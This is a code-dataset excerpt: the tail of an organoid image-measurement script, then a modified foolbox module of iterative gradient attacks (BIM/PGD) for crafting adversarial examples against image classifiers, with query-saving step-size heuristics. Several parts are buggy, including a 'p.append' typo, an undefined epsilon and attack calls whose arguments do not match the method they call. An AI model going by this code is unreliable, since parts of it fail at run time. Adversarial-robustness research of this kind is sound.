imageObjects = skimage.measure.regionprops(labelledImage)\n for object in imageObjects:\n if property == 'roundness':\n propertyValue = 
CalculateRoundness(getattr(object, 'area'), getattr(object, 'perimeter'))\n else:\n propertyValue = getattr(object, property)\n objectLabel = object.label\n propertyDF.iloc[objectLabel, 0] = str(propertyValue)\n\n return propertyDF\n\ndef PlotBoxplotWithJitter(valuesDF, property, unit):\n valuesStrings = valuesDF.loc[1:, 0].values.tolist()\n valuesFloats = [float(value) for value in valuesStrings]\n valuesJitter = np.random.normal(1, 0.04, len(valuesFloats))\n\n plt.rcParams.update({'font.size': 20})\n plt.rcParams['figure.figsize'] = (3, 4)\n fig, ax = plt.subplots()\n ax.boxplot(valuesFloats, showfliers=False, widths=0.6)\n # ax.set_ylabel(f'{property.capitalize()} ({unit})')\n colourPalette = ['b', 'g', 'r', 'c']\n if property != 'area':\n ax.set_ylim([0, 1])\n plt.tick_params(\n axis='x', # changes apply to the x-axis\n which='both', # both major and minor ticks are affected\n bottom=False, # ticks along the bottom edge are off\n top=False, # ticks along the top edge are off\n labelbottom=False)\n ax.scatter(valuesJitter, valuesFloats, alpha=0.4, color=colourPalette[0])\n plt.tight_layout()\n plt.show()\n\n\ndef PlotPropertyBoxplot(binaryImage, property, unit):\n labelledImage = Label(binaryImage)\n\n propertyDF = CreatePropertyDF(labelledImage, property)\n\n PlotBoxplotWithJitter(propertyDF, property, unit)\n\n\ndef PlotWithPlotly(original, binary):\n img = original\n labels = Label(binary)\n\n fig = px.imshow(img, binary_string=True)\n fig.update_traces(hoverinfo='skip') # hover is only for label info\n\n props = measure.regionprops(labels, img)\n properties = ['area', 'eccentricity', 'solidity', 'perimeter']\n\n # For each label, add a filled scatter trace for its contour,\n # and display the properties of the label in the hover of this trace.\n for index in range(1, labels.max()):\n label_i = props[index].label\n contour = measure.find_contours(labels == label_i, 0.5)[0]\n y, x = contour.T\n hoverinfo = ''\n for prop_name in properties:\n hoverinfo += f'{prop_name}: {getattr(props[index], prop_name):.2f}
<br>'\n        fig.add_trace(go.Scatter(\n            x=x, y=y, name=label_i,\n            mode='lines', fill='toself', showlegend=False,\n            hovertemplate=hoverinfo, hoveron='points+fills'))\n\n    plotly.io.show(fig)\n\n\n\n# Set directories\nimagesDir = Path('/home/franz/Documents/mep/report/results/measurement/input')\nexportPath = Path('/home/franz/Documents/mep/report/results/measurement/output')\nsegmentedExportPath = exportPath / 'OrganoTrack-segmented'\n\n# Import images\nrawImages, imagesPaths = ReadImages(imagesDir)\n\n# Get segmentations\nif not os.path.exists(segmentedExportPath):\n    extraBlur = False\n    blurSize = 3\n    displaySegmentationSteps = False\n    segParams = [0.5, 250, 150, extraBlur, blurSize, displaySegmentationSteps]\n    saveSegParams = [True, exportPath, imagesPaths]\n    predictedImages = SegmentWithOrganoSegPy(rawImages, segParams, saveSegParams)\nelse:\n    predictedImages, imagesPaths = ReadImages(segmentedExportPath)\n\n# Display overlays\nfor i, (raw, prediction) in enumerate(zip(rawImages, predictedImages)):\n    overlayed = ExportImageWithContours(raw, prediction)\n    Display(str(i), overlayed, 1)\n    # PlotWithPlotly(raw, prediction)\n\n\n# PlotPropertyBoxplot(predictedImages[3], 'area', 'pixels')\n\ncv.waitKey(0)", "repo_name": "ErasmusMC-Bioinformatics/OrganoTrack", "sub_path": "Using-OrganoTrack/report-results-measuring.py", "file_name": "report-results-measuring.py", "file_ext": "py", "file_size_in_byte": 4421, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "skimage.measure.label", "line_number": 20, "usage_type": "call"}, {"api_name": "skimage.measure", "line_number": 20, "usage_type": "attribute"}, {"api_name": "numpy.max", "line_number": 25, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 26, "usage_type": "call"}, {"api_name": "skimage.measure.regionprops", "line_number": 28, "usage_type": "call"}, {"api_name": "skimage.measure", "line_number": 28, "usage_type": "attribute"}, {"api_name": "OrganoTrack.Measuring.CalculateRoundness", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.random.normal", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 42, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.rcParams.update", "line_number": 44, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 44, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 44, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 45, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 45, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 46, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 46, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tick_params", "line_number": 52, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 52, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 59, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 59, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 60, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 60, "usage_type": "name"}, {"api_name": "plotly.express.imshow", "line_number": 75, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 75, "usage_type": "name"}, 
{"api_name": "skimage.measure.regionprops", "line_number": 78, "usage_type": "call"}, {"api_name": "skimage.measure", "line_number": 78, "usage_type": "name"}, {"api_name": "skimage.measure.find_contours", "line_number": 85, "usage_type": "call"}, {"api_name": "skimage.measure", "line_number": 85, "usage_type": "name"}, {"api_name": "plotly.graph_objects.Scatter", "line_number": 90, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 90, "usage_type": "name"}, {"api_name": "plotly.io.show", "line_number": 95, "usage_type": "call"}, {"api_name": "plotly.io", "line_number": 95, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 100, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 101, "usage_type": "call"}, {"api_name": "OrganoTrack.Importing.ReadImages", "line_number": 105, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 108, "usage_type": "call"}, {"api_name": "os.path", "line_number": 108, "usage_type": "attribute"}, {"api_name": "OrganoTrack.Detecting.SegmentWithOrganoSegPy", "line_number": 114, "usage_type": "call"}, {"api_name": "OrganoTrack.Importing.ReadImages", "line_number": 116, "usage_type": "call"}, {"api_name": "OrganoTrack.Displaying.ExportImageWithContours", "line_number": 120, "usage_type": "call"}, {"api_name": "OrganoTrack.Displaying.Display", "line_number": 121, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 127, "usage_type": "call"}]} +{"seq_id": "14910961719", "text": "#coding=utf-8\r\n\r\nfrom __future__ import division\r\nimport numpy as np\r\nfrom abc import abstractmethod\r\nimport logging\r\nimport warnings\r\n\r\nfrom foolbox.attacks.base import Attack\r\nfrom foolbox.attacks.base import call_decorator\r\nfrom foolbox import distances\r\nfrom foolbox.utils import crossentropy\r\n\r\n\r\nlog_or_not = False\r\n\r\ndef l2_distance(a, b):\r\n return (np.sum((a/255.0 - b/255.0) ** 2))**0.5\r\n\r\n\r\ndef step_value_estimate(noise_g, noise_now, alpha, step_now,):\r\n #用来判断是否仍有迭代下去的价值\r\n \"\"\"Base class for iterative (projected) gradient attacks.\r\n noise_g : 高斯噪声幅度\r\n noise_now : 迭代到当前这一步已经走过的步数\r\n alpha : 使用cab平均每一步实现的噪声压缩,默认0.9985\r\n step_now : 当前已经走过的步数\r\n step_future: 未来还要走的步数\r\n \"\"\"\r\n noise_future = noise_now + noise_now/step_now\r\n # print(\"noise_g, noise_now, step_now, current_value\", noise_g, noise_now, step_now, noise_future**2 + (1-alpha)*(noise_g**2) - noise_g*noise_future)\r\n if noise_future**2 + (1-alpha)*(noise_g**2) - noise_g*noise_future >= 0:\r\n #无意义\r\n return True\r\n else:\r\n return False\r\n\r\n\r\ndef binary_value_estimate(noise_l, noise_r, alpha):\r\n #用来判断在寻找合适步长时是否仍有二分下去的价值\r\n \"\"\"Base class for iterative (projected) gradient attacks.\r\n noise_l : 直线上非对抗样本的最大噪声\r\n noise_r : 直线上确定是对抗样本的最小噪声(noise_g)\r\n alpha : 使用cab平均每一步实现的噪声压缩,默认0.9985\r\n \"\"\"\r\n\r\n if (alpha - 0.75)*noise_r - 0.25*noise_l > 0:\r\n #值得继续二分\r\n return True\r\n else:\r\n return False\r\n\r\n\r\n\r\n\r\nclass IterativeProjectedGradientBaseAttack(Attack):\r\n \"\"\"Base class for iterative (projected) gradient attacks.\r\n\r\n Concrete subclasses should implement __call__, _gradient\r\n and _clip_perturbation.\r\n\r\n TODO: add support for other loss-functions, e.g. 
the CW loss function,\r\n see https://github.com/MadryLab/mnist_challenge/blob/master/pgd_attack.py\r\n \"\"\"\r\n\r\n @abstractmethod\r\n def _gradient(self, a, x, class_, strict=True):\r\n raise NotImplementedError\r\n\r\n @abstractmethod\r\n def _clip_perturbation(self, a, noise, epsilon):\r\n raise NotImplementedError\r\n\r\n @abstractmethod\r\n def _check_distance(self, a):\r\n raise NotImplementedError\r\n\r\n def _get_mode_and_class(self, a):\r\n # determine if the attack is targeted or not\r\n target_class = a.target_class\r\n targeted = target_class is not None\r\n\r\n if targeted:\r\n class_ = target_class\r\n else:\r\n class_ = a.original_class\r\n return targeted, class_\r\n\r\n def _run(self, a, iterations, random_start, return_early, vr_or_not, scale, m, worthless, binary, RC, exp_step):\r\n if not a.has_gradient():\r\n warnings.warn('applied gradient-based attack to model that'\r\n ' does not provide gradients')\r\n return\r\n\r\n self._check_distance(a)\r\n\r\n a.evolutionary_doc = np.array([])\r\n\r\n min_, max_ = a.bounds()\r\n\r\n targeted, class_ = self._get_mode_and_class(a)\r\n\r\n #首先确定步长\r\n original = a.unperturbed.copy()\r\n\r\n temp_scale = 1 \r\n for scale_counter in range(1, 9999):\r\n temp_scale_x = np.clip(np.random.normal(loc=a.unperturbed, scale=temp_scale), min_, max_).astype(np.float32)\r\n logits, is_adversarial = a.forward_one(np.round(temp_scale_x))\r\n\r\n if a._Adversarial__best_adversarial is not None:\r\n a.evolutionary_doc = np.append(a.evolutionary_doc, l2_distance(a._Adversarial__best_adversarial, original))\r\n else:\r\n a.evolutionary_doc = np.append(a.evolutionary_doc, 80)\r\n\r\n if is_adversarial: #成功了,保存噪声幅度\r\n noise_r = temp_scale_x\r\n noise_l = original\r\n \r\n binary_counter = 0\r\n if binary: #选择进行二分\r\n for binary_counter in range(1, 9999):\r\n dist_r = l2_distance(np.round(noise_r), original)\r\n dist_l = l2_distance(np.round(noise_l), original)\r\n # print(\"dist_l, dist_r, estimate\", dist_l, dist_r, (0.9985 - 0.75)*dist_r - 0.25*dist_l)\r\n if binary_value_estimate(dist_l, dist_r, 0.9985): #说明值得\r\n logits, is_adversarial = a.forward_one(np.round((noise_r + noise_l)/2))\r\n if is_adversarial: #二分成功,出现新的更近的对抗样本\r\n noise_r = (noise_r + noise_l)/2\r\n else:\r\n noise_l = (noise_r + noise_l)/2\r\n\r\n if a._Adversarial__best_adversarial is not None:\r\n a.evolutionary_doc = np.append(a.evolutionary_doc, l2_distance(a._Adversarial__best_adversarial, original))\r\n else:\r\n a.evolutionary_doc = p.append(a.evolutionary_doc, 80)\r\n\r\n else: #不再值得了\r\n break\r\n \r\n stepsize = l2_distance(noise_r, original)/exp_step\r\n break\r\n else:\r\n temp_scale *= 1.5\r\n\r\n # print(\"temp_scale\", temp_scale)\r\n\r\n #目前已经用了scale_counter+binary_counter次的查询\r\n return self._run_one(a, stepsize, iterations-scale_counter-binary_counter, random_start, targeted, class_, return_early, vr_or_not, scale, m, l2_distance(temp_scale_x, original), worthless, RC)\r\n\r\n\r\n def _run_one(self, a, stepsize, iterations, random_start, targeted, class_, return_early, vr_or_not, scale, m, noise_g, worthless, RC):\r\n min_, max_ = a.bounds()\r\n s = max_ - min_\r\n\r\n \r\n\r\n original = a.unperturbed.copy()\r\n\r\n if random_start:\r\n # using uniform noise even if the perturbation clipping uses\r\n # a different norm because cleverhans does it the same way\r\n noise = np.random.uniform(\r\n -epsilon * s, epsilon * s, original.shape).astype(\r\n original.dtype)\r\n x = original + self._clip_perturbation(a, noise, epsilon)\r\n strict = False # because we 
don't enforce the bounds here\r\n else:\r\n x = original\r\n strict = True\r\n\r\n success = False\r\n\r\n if RC: #存在上山下山两条路径,进行初始化\r\n uphill_worthless_flag = False\r\n downhill_worthless_flag = False\r\n uphill_flag = True #上山标志物,True则上,否则下\r\n uphill_iterations = 0\r\n downhill_iterations = 0 #上山下山两个方向各走了多少步\r\n x_uphill = x.copy()\r\n x_downhill = x.copy() #上山下山两个维持的对抗样本\r\n uphill_abandon = False\r\n downhill_abandon = False #上山下山两个路径是否放弃\r\n else: #只存在一条路径,也就是上山路径\r\n uphill_worthless_flag = False\r\n x_uphill = x.copy()\r\n\r\n _ = 0\r\n for _ in range(iterations):\r\n if worthless: #进行价值判断\r\n if RC: #在上山/下山场景下进行价值判断\r\n if uphill_abandon and downhill_abandon: #两个方向都放弃了\r\n return success, iterations - uphill_iterations - downhill_iterations\r\n elif uphill_flag: #目前是上山阶段\r\n if uphill_iterations > 0: #已经不是第一次跑上山路径了\r\n uphill_worthless_flag = step_value_estimate(noise_g, l2_distance(x_uphill, original), 0.9985, uphill_iterations)\r\n if uphill_iterations > 0 and uphill_worthless_flag == True: #不值得继续算下去了\r\n uphill_abandon = True #放弃上山\r\n uphill_flag = False #开始下山\r\n continue\r\n elif uphill_flag == False: #目前是下山阶段\r\n if downhill_iterations > 0: #已经不是第一次跑下山路径了\r\n downhill_worthless_flag = step_value_estimate(noise_g, l2_distance(x_downhill, original), 0.9985, downhill_iterations)\r\n if downhill_iterations > 0 and downhill_worthless_flag == True: #不值得继续算下去了\r\n downhill_abandon = True #放弃下山\r\n uphill_flag = True #开始上山\r\n continue\r\n \r\n else: #没有上山/下山,单纯的上山路径\r\n if _ > 0: #不是第一步\r\n uphill_worthless_flag = step_value_estimate(noise_g, l2_distance(x_uphill, original), 0.9985, _)\r\n if _ > 0 and uphill_worthless_flag == True:\r\n #不值得继续算下去了\r\n return success, iterations - _\r\n\r\n #之后直接用x进行运算\r\n if RC:\r\n if uphill_flag: #目前是上山阶段\r\n x = x_uphill \r\n else: #目前是下山阶段\r\n x = x_downhill\r\n else: #没有上下山的事情\r\n x = x_uphill\r\n\r\n\r\n #使用vr-IGSM来平均梯度\r\n if vr_or_not:\r\n avg_gradient = 0\r\n for m_counter in range(m):\r\n temp_x = np.clip(np.random.normal(loc=x, scale=scale), min_, max_).astype(np.float32)\r\n temp_x.dtype = \"float32\"\r\n\r\n gradient = self._gradient(a, x, class_, strict=strict)\r\n avg_gradient += gradient\r\n \r\n gradient = avg_gradient/m\r\n else:\r\n #不需要vr-IGSM操作\r\n gradient = self._gradient(a, x, class_, strict=strict)\r\n\r\n # non-strict only for the first call and\r\n # only if random_start is True\r\n strict = True\r\n if targeted:\r\n gradient = -gradient\r\n\r\n # untargeted: gradient ascent on cross-entropy to original class\r\n # targeted: gradient descent on cross-entropy to target class\r\n \r\n if RC and uphill_flag == False and downhill_iterations == 0: \r\n #走到这里,如果使用上下山,且正在下山,且目前是第一步,则进行一步下山\r\n gradient = -gradient\r\n\r\n\r\n x = x + stepsize * gradient\r\n\r\n\r\n x = np.clip(x, min_, max_)\r\n\r\n logits, is_adversarial = a.forward_one(np.round(x))\r\n\r\n if a._Adversarial__best_adversarial is not None:\r\n a.evolutionary_doc = np.append(a.evolutionary_doc, l2_distance(a._Adversarial__best_adversarial, original))\r\n else:\r\n a.evolutionary_doc = np.append(a.evolutionary_doc, 80)\r\n\r\n # #FIXME\r\n # #查看替代模型与目标模型交叉熵变化\r\n # backward_logits = a.backward_model_predictions(np.round(x))\r\n # target_ce = crossentropy(a.original_class, logits)\r\n # source_ce = crossentropy(a.original_class, backward_logits)\r\n # print(\"target_cross_entropy, source_cross_entropy, distance\", target_ce, source_ce, l2_distance(np.round(x), original))\r\n if logging.getLogger().isEnabledFor(logging.DEBUG):\r\n if targeted:\r\n ce = 
crossentropy(a.original_class, logits)\r\n logging.debug('crossentropy to {} is {}'.format(\r\n a.original_class, ce))\r\n ce = crossentropy(class_, logits)\r\n logging.debug('crossentropy to {} is {}'.format(class_, ce))\r\n if is_adversarial:\r\n if return_early:\r\n print(\"final_step_size, iteration\", stepsize, _)\r\n return True, iterations - _ - 1\r\n else:\r\n success = True\r\n\r\n else: #如果没有成功,且正在上下山,则更新x_uphill和x_downhill\r\n if RC:\r\n if uphill_flag: #目前是上山阶段\r\n x_uphill = x\r\n uphill_iterations += 1\r\n \r\n elif uphill_flag == False: #目前是下山阶段\r\n x_downhill = x\r\n downhill_iterations += 1\r\n uphill_flag = (uphill_flag == False) #转换上/下山\r\n else:\r\n x_uphill = x\r\n \r\n #如果到最后也没成功\r\n if RC:\r\n return success, iterations - uphill_iterations - downhill_iterations\r\n else: \r\n return success, iterations - _ - 1\r\n\r\n\r\nclass LinfinityGradientMixin(object):\r\n def _gradient(self, a, x, class_, strict=True):\r\n gradient = a.gradient_one(x, class_, strict=strict)\r\n gradient = np.sign(gradient)\r\n min_, max_ = a.bounds()\r\n gradient = (max_ - min_) * gradient\r\n return gradient\r\n\r\n\r\n\r\nclass L1GradientMixin(object):\r\n def _gradient(self, a, x, class_, strict=True):\r\n gradient = a.gradient_one(x, class_, strict=strict)\r\n # using mean to make range of epsilons comparable to Linf\r\n gradient = gradient / np.mean(np.abs(gradient))\r\n min_, max_ = a.bounds()\r\n gradient = (max_ - min_) * gradient\r\n return gradient\r\n\r\n\r\nclass L2GradientMixin(object):\r\n def _gradient(self, a, x, class_, strict=True):\r\n gradient = a.gradient_one(x, class_, strict=strict)\r\n # using mean to make range of epsilons comparable to Linf\r\n\r\n # print(np.max(max(1e-12, np.mean(np.square(gradient)))))\r\n # print(np.min(max(1e-12, np.mean(np.square(gradient)))))\r\n gradient = gradient / np.sqrt(max(1e-12, np.sum(np.square(gradient))))\r\n min_, max_ = a.bounds()\r\n gradient = (max_ - min_) * gradient\r\n return gradient\r\n\r\n\r\nclass LinfinityClippingMixin(object):\r\n def _clip_perturbation(self, a, perturbation, epsilon):\r\n min_, max_ = a.bounds()\r\n s = max_ - min_\r\n clipped = np.clip(perturbation, -epsilon * s, epsilon * s)\r\n return clipped\r\n\r\n\r\nclass L1ClippingMixin(object):\r\n def _clip_perturbation(self, a, perturbation, epsilon):\r\n # using mean to make range of epsilons comparable to Linf\r\n norm = np.mean(np.abs(perturbation))\r\n norm = max(1e-12, norm) # avoid divsion by zero\r\n min_, max_ = a.bounds()\r\n s = max_ - min_\r\n # clipping, i.e. only decreasing norm\r\n factor = min(1, epsilon * s / norm)\r\n return perturbation * factor\r\n\r\n\r\nclass L2ClippingMixin(object):\r\n def _clip_perturbation(self, a, perturbation, epsilon):\r\n # using mean to make range of epsilons comparable to Linf\r\n norm = np.sqrt(np.mean(np.square(perturbation)))\r\n norm = max(1e-12, norm) # avoid divsion by zero\r\n min_, max_ = a.bounds()\r\n s = max_ - min_\r\n # clipping, i.e. 
only decreasing norm\r\n factor = min(1, epsilon * s / norm)\r\n return perturbation * factor\r\n\r\n\r\nclass LinfinityDistanceCheckMixin(object):\r\n def _check_distance(self, a):\r\n if not isinstance(a.distance, distances.Linfinity):\r\n logging.warning('Running an attack that tries to minimize the'\r\n ' Linfinity norm of the perturbation without'\r\n ' specifying foolbox.distances.Linfinity as'\r\n ' the distance metric might lead to suboptimal'\r\n ' results.')\r\n\r\n\r\nclass L1DistanceCheckMixin(object):\r\n def _check_distance(self, a):\r\n if not isinstance(a.distance, distances.MAE):\r\n logging.warning('Running an attack that tries to minimize the'\r\n ' L1 norm of the perturbation without'\r\n ' specifying foolbox.distances.MAE as'\r\n ' the distance metric might lead to suboptimal'\r\n ' results.')\r\n\r\n\r\nclass L2DistanceCheckMixin(object):\r\n def _check_distance(self, a):\r\n if not isinstance(a.distance, distances.MSE):\r\n logging.warning('Running an attack that tries to minimize the'\r\n ' L2 norm of the perturbation without'\r\n ' specifying foolbox.distances.MSE as'\r\n ' the distance metric might lead to suboptimal'\r\n ' results.')\r\n\r\n\r\nclass LinfinityBasicIterativeAttack(\r\n LinfinityGradientMixin,\r\n LinfinityClippingMixin,\r\n LinfinityDistanceCheckMixin,\r\n IterativeProjectedGradientBaseAttack):\r\n\r\n \"\"\"The Basic Iterative Method introduced in [1]_.\r\n\r\n This attack is also known as Projected Gradient\r\n Descent (PGD) (without random start) or FGMS^k.\r\n\r\n References\r\n ----------\r\n .. [1] Alexey Kurakin, Ian Goodfellow, Samy Bengio,\r\n \"Adversarial examples in the physical world\",\r\n https://arxiv.org/abs/1607.02533\r\n\r\n .. seealso:: :class:`ProjectedGradientDescentAttack`\r\n\r\n \"\"\"\r\n\r\n @call_decorator\r\n def __call__(self, input_or_adv, label=None, unpack=True,\r\n iterations=10,\r\n random_start=False,\r\n return_early=True):\r\n \"\"\"Simple iterative gradient-based attack known as\r\n Basic Iterative Method, Projected Gradient Descent or FGSM^k.\r\n\r\n Parameters\r\n ----------\r\n input_or_adv : `numpy.ndarray` or :class:`Adversarial`\r\n The original, unperturbed input as a `numpy.ndarray` or\r\n an :class:`Adversarial` instance.\r\n label : int\r\n The reference label of the original input. Must be passed\r\n if `a` is a `numpy.ndarray`, must not be passed if `a` is\r\n an :class:`Adversarial` instance.\r\n unpack : bool\r\n If true, returns the adversarial input, otherwise returns\r\n the Adversarial object.\r\n binary_search : bool or int\r\n Whether to perform a binary search over epsilon and stepsize,\r\n keeping their ratio constant and using their values to start\r\n the search. 
If False, hyperparameters are not optimized.\r\n            Can also be an integer, specifying the number of binary\r\n            search steps (default 20).\r\n        epsilon : float\r\n            Limit on the perturbation size; if binary_search is True,\r\n            this value is only for initialization and automatically\r\n            adapted.\r\n        stepsize : float\r\n            Step size for gradient descent; if binary_search is True,\r\n            this value is only for initialization and automatically\r\n            adapted.\r\n        iterations : int\r\n            Number of iterations for each gradient descent run.\r\n        random_start : bool\r\n            Start the attack from a random point rather than from the\r\n            original input.\r\n        return_early : bool\r\n            Whether an individual gradient descent run should stop as\r\n            soon as an adversarial is found.\r\n        \"\"\"\r\n\r\n        a = input_or_adv\r\n        del input_or_adv\r\n        del label\r\n        del unpack\r\n\r\n        # no epsilon parameter in this variant: the step size is estimated inside _run\r\n\r\n        self._run(a, iterations, random_start, return_early, False, 2, 1, False, False, False, 10)  # vr_or_not, scale, m, worthless, binary, RC, exp_step defaults matching L2BasicIterativeAttack\r\n\r\n\r\n
BasicIterativeMethod = LinfinityBasicIterativeAttack\r\nBIM = BasicIterativeMethod\r\n\r\n\r\nclass L1BasicIterativeAttack(\r\n        L1GradientMixin,\r\n        L1ClippingMixin,\r\n        L1DistanceCheckMixin,\r\n        IterativeProjectedGradientBaseAttack):\r\n\r\n    \"\"\"Modified version of the Basic Iterative Method\r\n    that minimizes the L1 distance.\r\n\r\n    .. seealso:: :class:`LinfinityBasicIterativeAttack`\r\n\r\n    \"\"\"\r\n\r\n    @call_decorator\r\n    def __call__(self, input_or_adv, label=None, unpack=True,\r\n                 epsilon=0.3,\r\n                 stepsize=0.05,\r\n                 iterations=10,\r\n                 random_start=False,\r\n                 return_early=True):\r\n        \"\"\"Simple iterative gradient-based attack known as\r\n        Basic Iterative Method, Projected Gradient Descent or FGSM^k.\r\n\r\n        Parameters\r\n        ----------\r\n        input_or_adv : `numpy.ndarray` or :class:`Adversarial`\r\n            The original, unperturbed input as a `numpy.ndarray` or\r\n            an :class:`Adversarial` instance.\r\n        label : int\r\n            The reference label of the original input. Must be passed\r\n            if `a` is a `numpy.ndarray`, must not be passed if `a` is\r\n            an :class:`Adversarial` instance.\r\n        unpack : bool\r\n            If true, returns the adversarial input, otherwise returns\r\n            the Adversarial object.\r\n        binary_search : bool or int\r\n            Whether to perform a binary search over epsilon and stepsize,\r\n            keeping their ratio constant and using their values to start\r\n            the search. 
seealso:: :class:`LinfinityBasicIterativeAttack`\r\n\r\n \"\"\"\r\n\r\n @call_decorator\r\n def __call__(self, input_or_adv, label=None, unpack=False,\r\n epsilon=0.3,\r\n stepsize=0.05,\r\n iterations=10,\r\n random_start=False,\r\n return_early=True,\r\n vr_or_not=False,\r\n scale=2,\r\n m=1,\r\n worthless=False,\r\n binary=False,\r\n RC=False,\r\n exp_step=10):\r\n \"\"\"Simple iterative gradient-based attack known as\r\n Basic Iterative Method, Projected Gradient Descent or FGSM^k.\r\n\r\n Parameters\r\n ----------\r\n input_or_adv : `numpy.ndarray` or :class:`Adversarial`\r\n The original, unperturbed input as a `numpy.ndarray` or\r\n an :class:`Adversarial` instance.\r\n label : int\r\n The reference label of the original input. Must be passed\r\n if `a` is a `numpy.ndarray`, must not be passed if `a` is\r\n an :class:`Adversarial` instance.\r\n unpack : bool\r\n If true, returns the adversarial input, otherwise returns\r\n the Adversarial object.\r\n binary_search : bool or int\r\n Whether to perform a binary search over epsilon and stepsize,\r\n keeping their ratio constant and using their values to start\r\n the search. If False, hyperparameters are not optimized.\r\n Can also be an integer, specifying the number of binary\r\n search steps (default 20).\r\n epsilon : float\r\n Limit on the perturbation size; if binary_search is True,\r\n this value is only for initialization and automatically\r\n adapted.\r\n stepsize : float\r\n Step size for gradient descent; if binary_search is True,\r\n this value is only for initialization and automatically\r\n adapted.\r\n iterations : int\r\n Number of iterations for each gradient descent run.\r\n random_start : bool\r\n Start the attack from a random point rather than from the\r\n original input.\r\n return_early : bool\r\n Whether an individual gradient descent run should stop as\r\n soon as an adversarial is found.\r\n \"\"\"\r\n\r\n a = input_or_adv\r\n del input_or_adv\r\n del label\r\n del unpack\r\n\r\n assert epsilon > 0\r\n\r\n self._run(a, iterations, random_start, return_early, vr_or_not, scale, m, worthless, binary, RC, exp_step)\r\n\r\n\r\nclass ProjectedGradientDescentAttack(\r\n LinfinityGradientMixin,\r\n LinfinityClippingMixin,\r\n LinfinityDistanceCheckMixin,\r\n IterativeProjectedGradientBaseAttack):\r\n\r\n \"\"\"The Projected Gradient Descent Attack\r\n introduced in [1]_ without random start.\r\n\r\n When used without a random start, this attack\r\n is also known as Basic Iterative Method (BIM)\r\n or FGSM^k.\r\n\r\n References\r\n ----------\r\n .. [1] Aleksander Madry, Aleksandar Makelov, Ludwig Schmidt,\r\n Dimitris Tsipras, Adrian Vladu, \"Towards Deep Learning\r\n Models Resistant to Adversarial Attacks\",\r\n https://arxiv.org/abs/1706.06083\r\n\r\n .. seealso::\r\n\r\n :class:`LinfinityBasicIterativeAttack` and\r\n :class:`RandomStartProjectedGradientDescentAttack`\r\n\r\n \"\"\"\r\n\r\n @call_decorator\r\n def __call__(self, input_or_adv, label=None, unpack=True,\r\n epsilon=0.3,\r\n stepsize=0.01,\r\n iterations=40,\r\n random_start=False,\r\n return_early=True):\r\n \"\"\"Simple iterative gradient-based attack known as\r\n Basic Iterative Method, Projected Gradient Descent or FGSM^k.\r\n\r\n Parameters\r\n ----------\r\n input_or_adv : `numpy.ndarray` or :class:`Adversarial`\r\n The original, unperturbed input as a `numpy.ndarray` or\r\n an :class:`Adversarial` instance.\r\n label : int\r\n The reference label of the original input. 
Must be passed\r\n if `a` is a `numpy.ndarray`, must not be passed if `a` is\r\n an :class:`Adversarial` instance.\r\n unpack : bool\r\n If true, returns the adversarial input, otherwise returns\r\n the Adversarial object.\r\n binary_search : bool or int\r\n Whether to perform a binary search over epsilon and stepsize,\r\n keeping their ratio constant and using their values to start\r\n the search. If False, hyperparameters are not optimized.\r\n Can also be an integer, specifying the number of binary\r\n search steps (default 20).\r\n epsilon : float\r\n Limit on the perturbation size; if binary_search is True,\r\n this value is only for initialization and automatically\r\n adapted.\r\n stepsize : float\r\n Step size for gradient descent; if binary_search is True,\r\n this value is only for initialization and automatically\r\n adapted.\r\n iterations : int\r\n Number of iterations for each gradient descent run.\r\n random_start : bool\r\n Start the attack from a random point rather than from the\r\n original input.\r\n return_early : bool\r\n Whether an individual gradient descent run should stop as\r\n soon as an adversarial is found.\r\n \"\"\"\r\n\r\n a = input_or_adv\r\n del input_or_adv\r\n del label\r\n del unpack\r\n\r\n assert epsilon > 0\r\n\r\n self._run(a, epsilon, stepsize, iterations,\r\n random_start, return_early)\r\n\r\n\r\nProjectedGradientDescent = ProjectedGradientDescentAttack\r\nPGD = ProjectedGradientDescent\r\n\r\n\r\nclass RandomStartProjectedGradientDescentAttack(\r\n LinfinityGradientMixin,\r\n LinfinityClippingMixin,\r\n LinfinityDistanceCheckMixin,\r\n IterativeProjectedGradientBaseAttack):\r\n\r\n \"\"\"The Projected Gradient Descent Attack\r\n introduced in [1]_ with random start.\r\n\r\n References\r\n ----------\r\n .. [1] Aleksander Madry, Aleksandar Makelov, Ludwig Schmidt,\r\n Dimitris Tsipras, Adrian Vladu, \"Towards Deep Learning\r\n Models Resistant to Adversarial Attacks\",\r\n https://arxiv.org/abs/1706.06083\r\n\r\n .. seealso:: :class:`ProjectedGradientDescentAttack`\r\n\r\n \"\"\"\r\n\r\n @call_decorator\r\n def __call__(self, input_or_adv, label=None, unpack=True,\r\n epsilon=0.3,\r\n stepsize=0.01,\r\n iterations=40,\r\n random_start=True,\r\n return_early=True):\r\n \"\"\"Simple iterative gradient-based attack known as\r\n Basic Iterative Method, Projected Gradient Descent or FGSM^k.\r\n\r\n Parameters\r\n ----------\r\n input_or_adv : `numpy.ndarray` or :class:`Adversarial`\r\n The original, unperturbed input as a `numpy.ndarray` or\r\n an :class:`Adversarial` instance.\r\n label : int\r\n The reference label of the original input. Must be passed\r\n if `a` is a 